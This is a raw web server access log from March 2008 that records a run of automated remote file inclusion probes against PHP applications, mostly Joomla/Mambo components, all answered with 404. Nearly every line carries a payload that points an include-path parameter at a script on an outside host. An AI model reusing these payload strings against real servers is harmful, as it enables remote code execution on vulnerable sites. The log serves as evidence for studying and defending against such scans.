89.108.66.169 - - [23/Mar/2008:05:44:24 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.70.14.90 - - [23/Mar/2008:05:45:02 -0700] "GET /logs/access_080127.log/com_magazine&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.70.14.90 - - [23/Mar/2008:05:45:02 -0700] "GET /com_magazine&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.70.14.90 - - [23/Mar/2008:05:45:02 -0700] "GET /logs/com_magazine&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:45:06 -0700] "GET /logs/access_080213.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:45:06 -0700] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.86.167.140 - - [23/Mar/2008:05:45:06 -0700] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.177.56.40 - - [23/Mar/2008:05:45:28 -0700] "GET /logs/access_080101.log//templates/headline_temp.php?nst_inc=http://www.psyvlad.ru/newsm/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.177.56.40 - - [23/Mar/2008:05:45:28 -0700] "GET /logs//templates/headline_temp.php?nst_inc=http://www.psyvlad.ru/newsm/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:45:30 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:45:30 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.177.56.40 - - [23/Mar/2008:05:45:32 -0700] "GET /logs/access_071227.log//templates/headline_temp.php?nst_inc=http://www.psyvlad.ru/newsm/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.92.68.238 - - [23/Mar/2008:05:45:35 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.zahnwerk.com/contenido-4.4.4/contenido/includes/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.92.68.238 - - [23/Mar/2008:05:45:35 -0700] "GET /errors.php?error=http://www.zahnwerk.com/contenido-4.4.4/contenido/includes/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.92.68.238 - - [23/Mar/2008:05:45:36 -0700] "GET /logs/errors.php?error=http://www.zahnwerk.com/contenido-4.4.4/contenido/includes/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:45:49 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:45:49 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:45:50 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.70.14.90 - - [23/Mar/2008:05:46:04 -0700] "GET /logs/access_071209.log/com_magazine&Itemid=&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.177.56.40 - - [23/Mar/2008:05:46:35 -0700] "GET //faqsupport/index.php//faqsupport/include.php?path[docroot]=http://www.psyvlad.ru/newsm/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.236.198.80 - - [23/Mar/2008:05:46:56 -0700] "GET /logs/access_080219.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_linkdirectory&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
216.177.56.40 - - [23/Mar/2008:05:47:07 -0700] "GET /logs/access_080225.log//faqsupport/include.php?path[docroot]=http://www.psyvlad.ru/newsm/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.177.56.40 - - [23/Mar/2008:05:47:07 -0700] "GET /logs//faqsupport/include.php?path[docroot]=http://www.psyvlad.ru/newsm/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.218.141.19 - - [23/Mar/2008:05:47:08 -0700] "GET /logs/access_080228.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.my-sl.com//modules/TotalCalendar/lib/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [23/Mar/2008:05:47:21 -0700] "GET /modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=http://www.fiobera.unam.edu.ar/moodledata/cache/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
72.232.214.82 - - [23/Mar/2008:05:47